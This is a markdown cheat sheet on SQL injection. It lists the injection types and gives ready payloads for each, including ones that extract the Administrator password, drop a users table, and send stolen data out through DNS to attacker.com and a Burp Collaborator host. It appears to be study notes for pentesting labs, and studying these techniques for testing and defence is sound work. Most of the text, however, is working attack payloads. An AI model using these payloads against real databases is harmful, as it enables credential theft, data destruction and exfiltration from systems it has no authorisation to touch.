Types of sql injection:
- `Inline Queries`: Uncommon one that need custom implementation. `SELECT (SELECT @@version) from'
- `Stacked Queries`: Making mulitple of queries after the original one.  `; DROP TABLE users`
- `Error-based`: If the website show error messages, then we abuse this by feeding our custom query to see it as error. `AND GTID_SUBSET(@@version,0)'
- `UNION query-based`: rely on Unions. `UNION ALL SELECT 1,@@version,3`
- `Boolean-based blind`: rely on True or false result. `AND 1=1`
- `Time-based    blind`: laverage time to make sure our query have been executed.`AND 1=IF(2>1,SLEEP(5),0)`
- `Out-of-band   blind`: when all methods fails, we try to ping back to our machine. `LOAD_FILE(CONCAT('\\\\',@@version,'.attacker.com\\README.txt'))`

# When to use

## Stacked Queries
You can use Stacked queries to execute multiple queries in succession. Note that while the subsequent queries are executed, **the results are not returned to the application**. Hence this technique is primarily of use in relation to blind vulnerabilities where you can use a second query to trigger a `DNS lookup`, `conditional error`, or `time delay`.
```sql
category=Accessories';SELECT PG_SLEEP(5)--
```

## Error-based
when you can see the database output has reveiled error output.
```sql
' asdfasd
```

## Union-based
When you can see the database output on the page.
```sql
--First find number of columns   
  select title, cost from product where id='a' order by 1--' where anything

--Guess datatype of columns by inserting strings at first  
  Union select 'a', Null--
--Extract informations from the database  
'  UNION SELECT username || '~' || password FROM users--
```

## Boolean-based
Use this technique if you can't see the database output but you can see different response based on true or false.
```sql
xyz' AND SUBSTRING((SELECT Password FROM Users WHERE Username = 'Administrator'), 1, 1) > 'm
```

## Time-based
Use this when you can't see the database output and you can't see any difference in the response. 
```sql
'; IF (SELECT COUNT(Username) FROM Users WHERE Username = 'Administrator' AND SUBSTRING(Password, 1, 1) > 'm') = 1 WAITFOR DELAY '0:0:{delay}'--
```

## Out-of-Band
When none of above works try to this one.
```postgresql
'; declare @p varchar(1024);set @p=(SELECT password FROM users WHERE username='Administrator');exec('master..xp_dirtree "//'+@p+'.c9.burpcollaborator.net/a"')--
```